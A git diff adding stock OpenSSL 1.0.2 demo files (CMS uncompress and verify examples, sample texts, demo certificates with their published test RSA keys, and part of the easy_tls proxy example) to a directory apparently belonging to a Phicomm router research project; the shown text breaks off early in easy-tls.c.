diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_uncomp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_uncomp.c
new file mode 100644
index 0000000..392f4b4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_uncomp.c
@@ -0,0 +1,55 @@
+/* Simple S/MIME uncompression example */
+#include <openssl/pem.h>
+#include <openssl/cms.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL;
+    CMS_ContentInfo *cms = NULL;
+    int ret = 1;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Open compressed content */
+
+    in = BIO_new_file("smcomp.txt", "r");
+
+    if (!in)
+        goto err;
+
+    /* Sign content */
+    cms = SMIME_read_CMS(in, NULL);
+
+    if (!cms)
+        goto err;
+
+    out = BIO_new_file("smuncomp.txt", "w");
+    if (!out)
+        goto err;
+
+    /* Uncompress S/MIME message */
+    if (!CMS_uncompress(cms, out, NULL, 0))
+        goto err;
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Uncompressing Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (cms)
+        CMS_ContentInfo_free(cms);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_ver.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_ver.c
new file mode 100644
index 0000000..ca93551
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/cms_ver.c
@@ -0,0 +1,85 @@
+/* Simple S/MIME verification example */
+#include <openssl/pem.h>
+#include <openssl/cms.h>
+#include <openssl/err.h>
+
+int main(int argc, char **argv)
+{
+    BIO *in = NULL, *out = NULL, *tbio = NULL, *cont = NULL;
+    X509_STORE *st = NULL;
+    X509 *cacert = NULL;
+    CMS_ContentInfo *cms = NULL;
+
+    int ret = 1;
+
+    OpenSSL_add_all_algorithms();
+    ERR_load_crypto_strings();
+
+    /* Set up trusted CA certificate store */
+
+    st = X509_STORE_new();
+
+    /* Read in CA certificate */
+    tbio = BIO_new_file("cacert.pem", "r");
+
+    if (!tbio)
+        goto err;
+
+    cacert = PEM_read_bio_X509(tbio, NULL, 0, NULL);
+
+    if (!cacert)
+        goto err;
+
+    if (!X509_STORE_add_cert(st, cacert))
+        goto err;
+
+    /* Open message being verified */
+
+    in = BIO_new_file("smout.txt", "r");
+
+    if (!in)
+        goto err;
+
+    /* parse message */
+    cms = SMIME_read_CMS(in, &cont);
+
+    if (!cms)
+        goto err;
+
+    /* File to output verified content to */
+    out = BIO_new_file("smver.txt", "w");
+    if (!out)
+        goto err;
+
+    if (!CMS_verify(cms, NULL, st, cont, out, 0)) {
+        fprintf(stderr, "Verification Failure\n");
+        goto err;
+    }
+
+    fprintf(stderr, "Verification Successful\n");
+
+    ret = 0;
+
+ err:
+
+    if (ret) {
+        fprintf(stderr, "Error Verifying Data\n");
+        ERR_print_errors_fp(stderr);
+    }
+
+    if (cms)
+        CMS_ContentInfo_free(cms);
+
+    if (cacert)
+        X509_free(cacert);
+
+    if (in)
+        BIO_free(in);
+    if (out)
+        BIO_free(out);
+    if (tbio)
+        BIO_free(tbio);
+
+    return ret;
+
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/comp.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/comp.txt
new file mode 100644
index 0000000..1672328
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/comp.txt
@@ -0,0 +1,22 @@
+Content-type: text/plain
+
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
+Some Text To be Compressed
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/encr.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/encr.txt
new file mode 100644
index 0000000..0eceb40
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/encr.txt
@@ -0,0 +1,3 @@
+Content-type: text/plain
+
+Sample OpenSSL Data for CMS encryption
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/sign.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/sign.txt
new file mode 100644
index 0000000..c3f9d73
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/sign.txt
@@ -0,0 +1,3 @@
+Content-type: text/plain
+
+Test OpenSSL CMS Signed Content
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/signer.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/signer.pem
new file mode 100644
index 0000000..bac16ba
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/signer.pem
@@ -0,0 +1,32 @@
+-----BEGIN CERTIFICATE-----
+MIICpjCCAg+gAwIBAgIJAJ+rfmEoLQRhMA0GCSqGSIb3DQEBBAUAMFcxCzAJBgNV
+BAYTAlVLMRIwEAYDVQQHEwlUZXN0IENpdHkxFjAUBgNVBAoTDU9wZW5TU0wgR3Jv
+dXAxHDAaBgNVBAMTE1Rlc3QgUy9NSU1FIFJvb3QgQ0EwHhcNMDcwNDEzMTgyOTI3
+WhcNMTcwNDA5MTgyOTI3WjBWMQswCQYDVQQGEwJVSzElMCMGA1UEAxMcT3BlblNT
+TCB0ZXN0IFMvTUlNRSBzaWduZXIgMTEgMB4GCSqGSIb3DQEJARYRdGVzdDFAb3Bl
+bnNzbC5vcmcwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAL1ocAQ7ON2pIUXz
+jwKPzpPB9ozB6PFG6F6kARO+i0DiT6Qn8abUjwpHPU+lGys83QlpbkQVUD6Fv/4L
+ytihk6N9Pr/feECVcSZ20dI43WXjfYak14dSVrZkGNMMXqKmnnqtkAdD0oJN7A7y
+gcf8RuViV0kvk9/36eCMwMHrImfhAgMBAAGjezB5MAkGA1UdEwQCMAAwLAYJYIZI
+AYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW
+BBSyKqjvctIsFNBHULBTqr8SHtSxpDAfBgNVHSMEGDAWgBRHUypxCXFQYqewhGo7
+2lWPQUsjoDANBgkqhkiG9w0BAQQFAAOBgQBvdYVoBfd4RV/xWSMXIcgw/i5OiwyX
+MsenQePll51MpglfArd7pUipUalCqlJt/Gs8kD16Ih1z1yuWYVTMlnDZ0PwbIOYn
++Jr8XLF9b1SMJt6PwckZZ0LZdIi2KwGAxVsIW1kjJAqu9o4YH37XW37yYdQRxfvv
+lDiQlgX0JtmLgA==
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIICXAIBAAKBgQC9aHAEOzjdqSFF848Cj86TwfaMwejxRuhepAETvotA4k+kJ/Gm
+1I8KRz1PpRsrPN0JaW5EFVA+hb/+C8rYoZOjfT6/33hAlXEmdtHSON1l432GpNeH
+Ula2ZBjTDF6ipp56rZAHQ9KCTewO8oHH/EblYldJL5Pf9+ngjMDB6yJn4QIDAQAB
+AoGACCuYIWaYll80UzslYRvo8lC8nOfEb5v6bBKxBTQD98GLY+5hKywiG3RlPalG
+mb/fXQeSPReaRYgpdwD1OBEIOEMW9kLyqpzokC0xjpZ+MwsuJTlxCesk5GEsMa3o
+wC3QMmiRA7qrZ/SzTtwrs++9mZ/pxp8JZ6pKYUj8SE7/vV0CQQDz8Ix2t40E16hx
+04+XhClnGqydZJyLLSxcTU3ZVhYxL+efo/5hZ8tKpkcDi8wq6T03BOKrKxrlIW55
+qDRNM24rAkEAxsWzu/rJhIouQyNoYygEIEYzFRlTQyZSg59u6dNiewMn27dOAbyc
+YT7B6da7e74QttTXo0lIllsX2S38+XsIIwJBANSRuIU3G66tkr5l4gnhhAaxqtuY
+sgVhvvdL8dvC9aG1Ifzt9hzBSthpHxbK+oYmK07HdhI8hLpIMLHYzoK7n3MCQEy4
+4rccBcxyyYiAkjozp+QNNIpgTBMPJ6pGT7lRLiHtBeV4y1NASdv/LTnk+Fi69Bid
+7t3H24ytfHcHmS1yn6ECQF6Jmh4C7dlvp59zXp+t+VsXxa/8sq41vKNIj0Rx9vh5
+xp9XL0C5ZpgmBnsTydP9pmkiL4ltLbMX0wJU6N2cmFw=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/signer2.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/signer2.pem
new file mode 100644
index 0000000..25e23d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/cms/signer2.pem
@@ -0,0 +1,32 @@
+-----BEGIN CERTIFICATE-----
+MIICpjCCAg+gAwIBAgIJAJ+rfmEoLQRiMA0GCSqGSIb3DQEBBAUAMFcxCzAJBgNV
+BAYTAlVLMRIwEAYDVQQHEwlUZXN0IENpdHkxFjAUBgNVBAoTDU9wZW5TU0wgR3Jv
+dXAxHDAaBgNVBAMTE1Rlc3QgUy9NSU1FIFJvb3QgQ0EwHhcNMDcwNDEzMTgyOTQ0
+WhcNMTcwNDA5MTgyOTQ0WjBWMQswCQYDVQQGEwJVSzElMCMGA1UEAxMcT3BlblNT
+TCB0ZXN0IFMvTUlNRSBzaWduZXIgMjEgMB4GCSqGSIb3DQEJARYRdGVzdDJAb3Bl
+bnNzbC5vcmcwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANco7VPgX9vcGwmZ
+jYqjq1JiR7M38dsMNhuJyLRVjJ5/cpFluQydQuG1PhzOJ8zfYVFicOXKvbYuKuXW
+ozZIwzqEqWsNf36KHTLS6yOMG8I13cRInh+fAIKq9Z8Eh65I7FJzVsNsfEQrGfEW
+GMA8us24IaSvP3QkbfHJn/4RaKznAgMBAAGjezB5MAkGA1UdEwQCMAAwLAYJYIZI
+AYb4QgENBB8WHU9wZW5TU0wgR2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQW
+BBRlrLQJUB8uAa4q8B2OqvvTXonF5zAfBgNVHSMEGDAWgBRHUypxCXFQYqewhGo7
+2lWPQUsjoDANBgkqhkiG9w0BAQQFAAOBgQBQbi2juGALg2k9m1hKpzR2lCGmGO3X
+h3Jh/l0vIxDr0RTgP2vBrtITlx655P/o1snoeTIpYG8uUnFnTE/6YakdayAIlxV4
+aZl63AivZMpQB5SPaPH/jEsGJ8UQMfdiy4ORWIULupuPKlKwODNw7tVhQIACS/DR
+2aX6rl2JEuJ5Yg==
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIICXAIBAAKBgQDXKO1T4F/b3BsJmY2Ko6tSYkezN/HbDDYbici0VYyef3KRZbkM
+nULhtT4czifM32FRYnDlyr22Lirl1qM2SMM6hKlrDX9+ih0y0usjjBvCNd3ESJ4f
+nwCCqvWfBIeuSOxSc1bDbHxEKxnxFhjAPLrNuCGkrz90JG3xyZ/+EWis5wIDAQAB
+AoGAUTB2bcIrKfGimjrBOGGOUmYXnD8uGnQ/LqENhU8K4vxApTD3ZRUqmbUknQYF
+6r8YH/e/llasw8QkF9qod+F5GTgsnyh/aMidFHKrXXbf1662scz9+S6crSXq9Eb2
+CL57f6Kw61k6edrz8zHdA+rnTK00hzgzKCP4ZL5k8/55ueECQQD+BK+nsKi6CcKf
+m3Mh61Sf2Icm5JlMCKaihlbnh78lBN1imYUAfHJEnQ1ujxXB94R+6o9S+XrWTnTX
+2m/JNIfpAkEA2NaidX7Sv5jnRPkwJ02Srl0urxINLmg4bU0zmM3VoMklYBHWnMyr
+upPZGPh5TzCa+g6FTBmU8XK61wvnEKNcTwJBAM24VdnlBIDGbsx8RJ3vzLU30xz4
+ff5J80okqjUQhwkgC3tTAZgHMTPITZyAXQqdvrxakoCMc6MkHxTBX08AMCECQHHL
+SdyxXrYv7waSY0PtANJCkpJLveEhzqMFxdMmCjtj9BpTojYNbv3uQxtIopj9YAdk
+gW2ray++zvC2DV/86x8CQH4UJwgO6JqU4bSgi6HiRNjDg26tJ0Beu8jjl1vrkIVX
+pHFwSUeLZUsT2/iTUSgYH4uYiZPgYNcKTCT9W6se30A=
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/Makefile
new file mode 100644
index 0000000..2080700
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/Makefile
@@ -0,0 +1,123 @@
+# Makefile for easy-tls example application (rudimentary client and server)
+# $Id: Makefile,v 1.2 2001/09/18 09:15:40 bodo Exp $
+
+SOLARIS_CFLAGS=-Wall -pedantic -g -O2
+SOLARIS_LIBS=-lxnet
+
+LINUX_CFLAGS=-Wall -pedantic -g -O2
+LINUX_LIBS=
+
+
+auto-all:
+	case `uname -s` in \
+	SunOS) echo Using SunOS configuration; \
+	  make SYSCFLAGS="$(SOLARIS_CFLAGS)" SYSLIBS="$(SOLARIS_LIBS)" all;; \
+	Linux) echo Using Linux configuration; \
+	  make SYSCFLAGS="$(LINUX_CFLAGS)" SYSLIBS="$(LINUX_LIBS)" all;; \
+	*) echo "unknown system"; exit 1;; \
+	esac
+
+all: test TAGS
+
+# For adapting this Makefile to a different system, only the following
+# definitions should need customizing:
+
+OPENSSLDIR=../..
+CC=gcc
+
+SYSCFLAGS=whatever
+SYSLIBS=whatever
+
+
+#############################################################################
+#
+# SSLeay/OpenSSL imports
+#
+# OPENSSLDIR (set above) can be either the directory where OpenSSL is
+# installed or the directory where it was compiled.
+
+# We rely on having a new OpenSSL release where include files
+# have names like <openssl/ssl.h> (not just <ssl.h>).
+OPENSSLINCLUDES=-I$(OPENSSLDIR)/include
+
+# libcrypto.a and libssl.a are directly in $(OPENSSLDIR) if this is
+# the compile directory, or in $(OPENSSLDIR)/lib if we use an installed
+# library.  With the following definition, we can handle either case.
+OPENSSLLIBS=-L$(OPENSSLDIR) -L$(OPENSSLDIR)/lib -lssl -lcrypto
+
+
+#############################################################################
+#
+# Stuff for handling the source files
+#
+
+SOURCES=easy-tls.c test.c
+HEADERS=easy-tls.h test.h
+DOCSandEXAMPLESetc=Makefile cert.pem cacerts.pem
+EVERYTHING=$(SOURCES) $(HEADERS) $(DOCSandEXAMPLESetc)
+
+ls: ls-l
+ls-l:
+	ls -l $(EVERYTHING)
+# For RCS:
+tag:
+	-rcs -n_`date +%y%m%d`: $(EVERYTHING)
+	rcs -nMYTAG $(EVERYTHING)
+	rcs -nMYTAG: $(EVERYTHING)
+diff:
+	-rcsdiff -rMYTAG -u $(EVERYTHING)
+today:
+	-rcsdiff -r_`date +%y%m%d` -u $(EVERYTHING)
+ident:
+	for a in $(EVERYTHING); do ident $$a; done
+
+# Distribution .tar:
+easy-tls.tar.gz: $(EVERYTHING)
+	tar cvf - $(EVERYTHING) | \
+	gzip -9 > easy-tls.tar.gz
+
+# Working .tar:
+tls.tgz: $(EVERYTHING)
+	tar cfv - `find . -type f -a ! -name '*.tgz' -a ! -name '*.tar.gz'` | \
+	gzip -9 > tls.tgz
+
+# For emacs:
+etags: TAGS
+TAGS: $(SOURCES) $(HEADERS)
+	-etags $(SOURCES) $(HEADERS)
+
+
+#############################################################################
+#
+# Compilation
+#
+# The following definitions are system dependent (and hence defined
+# at the beginning of this Makefile, where they are more easily found):
+
+### CC=gcc
+### SYSCFLAGS=-Wall -pedantic -g -O2
+### SYSLIBS=-lxnet
+
+EXTRACFLAGS=-DTLS_APP=\"test.h\"
+# EXTRACFLAGS=-DTLS_APP=\"test.h\" -DDEBUG_TLS
+
+#
+# The rest shouldn't need to be touched.
+#
+LDFLAGS=$(SYSLIBS) $(OPENSSLLIBS)
+INCLUDES=$(OPENSSLINCLUDES)
+CFLAGS=$(SYSCFLAGS) $(EXTRACFLAGS) $(INCLUDES)
+
+OBJS=easy-tls.o test.o
+
+clean:
+	@rm -f test
+	@rm -f TAGS
+	@rm -f *.o
+	@rm -f core
+
+test: $(OBJS)
+	$(CC) $(OBJS) $(LDFLAGS) -o test
+
+test.o: $(HEADERS)
+easy-tls.o: $(HEADERS)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/README
new file mode 100644
index 0000000..816a580
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/README
@@ -0,0 +1,65 @@
+easy_tls - generic SSL/TLS proxy
+========
+
+(... and example for non-blocking SSL/TLS I/O multiplexing.)
+
+
+  easy_tls.c, easy_tls.h:
+
+     Small generic SSL/TLS proxy library: With a few function calls,
+     an application socket will be replaced by a pipe handled by a
+     separate SSL/TLS proxy process.  This allows easily adding
+     SSL/TLS support to many programs not originally designed for it.
+
+     [Actually easy_tls.c is not a proper library: Customization
+     requires defining preprocessor macros while compiling it.
+     This is quite confusing, so I'll probably change it.]
+
+     These files may be used under the OpenSSL license.
+
+
+
+  test.c, test.h, Makefile, cert.pem, cacerts.pem:
+
+     Rudimentary example program using the easy_tls library, and
+     example key and certificates for it.  Usage examples:
+
+       $ ./test 8443     # create server listening at port 8443
+       $ ./test 127.0.0.1 8443  # create client, connect to port 8443
+                                # at IP address 127.0.0.1
+
+     'test' will not automatically do SSL/TLS, or even read or write
+     data -- it must be told to do so on input lines starting
+     with a command letter.  'W' means write a line, 'R' means
+     read a line, 'C' means close the connection, 'T' means
+     start an SSL/TLS proxy.  E.g. (user input tagged with '*'):
+
+     * R
+       <<< 220 mail.example.net
+     * WSTARTTLS
+       >>> STARTTLS
+     * R
+       <<< 220 Ready to start TLS
+     * T
+       test_process_init(fd = 3, client_p = 1, apparg = (nil))
+       +++ `E:self signed certificate in certificate chain'
+       +++ `<... certificate info ...>'
+     * WHELO localhost
+       >>> HELO localhost
+       R
+       <<< 250 mail.example.net
+
+     You can even do SSL/TLS over SSL/TLS over SSL/TLS ... by using
+     'T' multiple times.  I have no idea why you would want to though.
+
+
+This code is rather old.  When I find time I will update anything that
+should be changed, and improve code comments.  To compile the sample
+program 'test' on platforms other then Linux or Solaris, you will have
+to edit the Makefile.
+
+As noted above, easy_tls.c will be changed to become a library one
+day, which means that future revisions will not be fully compatible to
+the current version.
+
+Bodo Möller <bodo@openssl.org>
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/cacerts.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/cacerts.pem
new file mode 100644
index 0000000..acc70ba
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/cacerts.pem
@@ -0,0 +1,18 @@
+$Id: cacerts.pem,v 1.1 2001/09/17 19:06:57 bodo Exp $
+
+issuer= /C=AU/ST=Queensland/O=CryptSoft Pty Ltd/CN=Test PCA (1024 bit)
+subject=/C=AU/ST=Queensland/O=CryptSoft Pty Ltd/CN=Test CA (1024 bit)
+-----BEGIN CERTIFICATE-----
+MIICJjCCAY8CAQAwDQYJKoZIhvcNAQEEBQAwXDELMAkGA1UEBhMCQVUxEzARBgNV
+BAgTClF1ZWVuc2xhbmQxGjAYBgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMRwwGgYD
+VQQDExNUZXN0IFBDQSAoMTAyNCBiaXQpMB4XDTk3MDYwOTEzNTc0M1oXDTAxMDYw
+OTEzNTc0M1owWzELMAkGA1UEBhMCQVUxEzARBgNVBAgTClF1ZWVuc2xhbmQxGjAY
+BgNVBAoTEUNyeXB0U29mdCBQdHkgTHRkMRswGQYDVQQDExJUZXN0IENBICgxMDI0
+IGJpdCkwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAKO7o8t116VP6cgybTsZ
+DCZhr95nYlZuya3aCi1IKoztqwWnjbmDFIriOqGFPrZQ+moMETC9D59iRW/dFXSv
+1F65ka/XY2hLh9exCCo7XuUcDs53Qp3bI3AmMqHjgzE8oO3ajyJAzJkTTOUecQU2
+mw/gI4tMM0LqWMQS7luTy4+xAgMBAAEwDQYJKoZIhvcNAQEEBQADgYEAM7achv3v
+hLQJcv/65eGEpBXM40ZDVoFQFFJWaY5p883HTqLB1x4FdzsXHH0QKBTcKpWwqyu4
+YDm3fb8oDugw72bCzfyZK/zVZPR/hVlqI/fvU109Qoc+7oPvIXWky71HfcK6ZBCA
+q30KIqGM/uoM60INq97qjDmCJapagcNBGQs=
+-----END CERTIFICATE-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/cert.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/cert.pem
new file mode 100644
index 0000000..364fe10
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/cert.pem
@@ -0,0 +1,31 @@
+$Id: cert.pem,v 1.1 2001/09/17 19:06:57 bodo Exp $
+
+Example certificate and key.
+
+-----BEGIN CERTIFICATE-----
+MIIB1jCCAT8CAQEwDQYJKoZIhvcNAQEEBQAwRTELMAkGA1UEBhMCQVUxEzARBgNV
+BAgTClNvbWUtU3RhdGUxITAfBgNVBAoTGEludGVybmV0IFdpZGdpdHMgUHR5IEx0
+ZDAeFw05OTA1MDEwMTI2MzVaFw05OTA1MzEwMTI2MzVaMCIxCzAJBgNVBAYTAkRF
+MRMwEQYDVQQDEwpUZXN0c2VydmVyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
+gQD6I3oDKiexwwlkzjar69AIFnVUaG85LtCege2R+CtIDlkQYw68/8MbT3ou0pdF
+AcL9IGiYY3Y0SHM9PqF00RO1MCtNpqTnF3ScLpbmggGjKilmWYn2ai7emdjMjXVL
+tzWW2xGgIGATWQN32KgfJng4jXi1UjEiyLhkw0Zf1I/ggwIDAQABMA0GCSqGSIb3
+DQEBBAUAA4GBAMgM+sbAk8DfjSfa+Rf2gcGXmbrvZAzKzC+5RU3kaq/NyxIXAGco
+9dZjozzWfN/xuGup5boFk+KrP+xdgsaqGHsyzlgEoqz4ekqLjQeVbnoj339hVFU9
+MhPi6JULPxjXKumjfX2LLNkikW5puz8Df3UiX0EiaJvd7EwP8J75tiUT
+-----END CERTIFICATE-----
+-----BEGIN RSA PRIVATE KEY-----
+MIICXQIBAAKBgQD6I3oDKiexwwlkzjar69AIFnVUaG85LtCege2R+CtIDlkQYw68
+/8MbT3ou0pdFAcL9IGiYY3Y0SHM9PqF00RO1MCtNpqTnF3ScLpbmggGjKilmWYn2
+ai7emdjMjXVLtzWW2xGgIGATWQN32KgfJng4jXi1UjEiyLhkw0Zf1I/ggwIDAQAB
+AoGANST8c1etf1MU19oIO5aqaE19OCXIG7oakNLCCtVTPMfvnE+vffBJH7BPIUuU
+4BBzwRv1nQrkvk72TPjVjOAu81B1SStKQueun2flVuYxp9NyupNWCBley4QdohlP
+I92ml2tzTSPmNIoA6jdGyNzFcGchapRRmejsC39F1RUbHQECQQD9KX81Wt8ZOrri
+dWiEXja1L3X8Bkb9vvUjVMQDTJJPxBJjehC6eurgE6PP6SJD5p/f3RHPCcLr8tSM
+D4P/OpKhAkEA/PFNlhIZUDKK6aTvG2mn7qQ5phbadOoyN1Js3ttWG5OMOZ6b/QlC
+Wvp84h44506BIlv+Tg2YAI0AdBUrf7oEowJAM4joAVd/ROaEtqbJ4PBA2L9RmD06
+5FqkEk4mHLnQqvYx/BgUIbH18ClvVlqSBBqFfw/EmU3WZSuogt6Bs0ocIQJBAOxB
+AoPiYcxbeQ5kZIVJOXaX49SzUdaUDNVJYrEBUzsspHQJJo/Avz606kJVkjbSR6Ft
+JWmIHuqcyMikIV4KxFsCQQCU2evoVjVsqkkbHi7W28f73PGBsyu0KIwlK7nu4h08
+Daf7TAI+A6jW/WRUsJ6dFhUYi7/Jvkcdrlnbgm2fxziX
+-----END RSA PRIVATE KEY-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/easy-tls.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/easy-tls.c
new file mode 100644
index 0000000..acc688a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/easy_tls/easy-tls.c
@@ -0,0 +1,1310 @@
+/* -*- Mode: C; c-file-style: "bsd" -*- */
+/*-
+ * easy-tls.c -- generic TLS proxy.
+ * $Id: easy-tls.c,v 1.4 2002/03/05 09:07:16 bodo Exp $
+ */
+/*-
+ (c) Copyright 1999 Bodo Moeller.  All rights reserved.
+
+ This is free software; you can redistributed and/or modify it
+ unter the terms of either
+   -  the GNU General Public License as published by the
+      Free Software Foundation, version 1, or (at your option)
+      any later version,
+ or
+   -  the following license:
+*/
+/*-
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that each of the following
+ * conditions is met:
+ *
+ * 1. Redistributions qualify as "freeware" or "Open Source Software" under
+ *    one of the following terms:
+ *
+ *    (a) Redistributions are made at no charge beyond the reasonable cost of
+ *        materials and delivery.
+ *
+ *    (b) Redistributions are accompanied by a copy of the Source Code
+ *        or by an irrevocable offer to provide a copy of the Source Code
+ *        for up to three years at the cost of materials and delivery.
+ *        Such redistributions must allow further use, modification, and
+ *        redistribution of the Source Code under substantially the same
+ *        terms as this license.
+ *
+ * 2. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 3. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 4. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by Bodo Moeller."
+ *    (If available, substitute umlauted o for oe.)
+ *
+ * 5. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by Bodo Moeller."
+ *
+ * THIS SOFTWARE IS PROVIDED BY BODO MOELLER ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL BODO MOELLER OR
+ * HIS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+/*-
+ * Attribution for OpenSSL library:
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ * This product includes software developed by the OpenSSL Project
+ * for use in the OpenSSL Toolkit. (http://www.openssl.org/)
+ */
+
+static char const rcsid[] =
+    "$Id: easy-tls.c,v 1.4 2002/03/05 09:07:16 bodo Exp $";
+
+#include <assert.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <stdarg.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/select.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+#include <unistd.h>
+
+#include <openssl/crypto.h>
+#include <openssl/dh.h>
+#include <openssl/dsa.h>
+#include <openssl/err.h>
+#include <openssl/evp.h>
+#include <openssl/opensslv.h>
+#include <openssl/pem.h>
+#include <openssl/rand.h>
+#ifndef NO_RSA
+# include <openssl/rsa.h>
+#endif
+#include <openssl/ssl.h>
+#include <openssl/x509.h>
+#include <openssl/x509_vfy.h>
+
+#if OPENSSL_VERSION_NUMBER < 0x00904000L /* 0.9.4-dev */
+# error "This program needs OpenSSL 0.9.4 or later."
+#endif
+
+#include "easy-tls.h"           /* include after <openssl/ssl.h> if both are
+                                 * needed */
+
+#if TLS_INFO_SIZE > PIPE_BUF
+# if PIPE_BUF < 512
+#  error "PIPE_BUF < 512"       /* non-POSIX */
+# endif
+# error "TLS_INFO_SIZE > PIPE_BUF"
+#endif
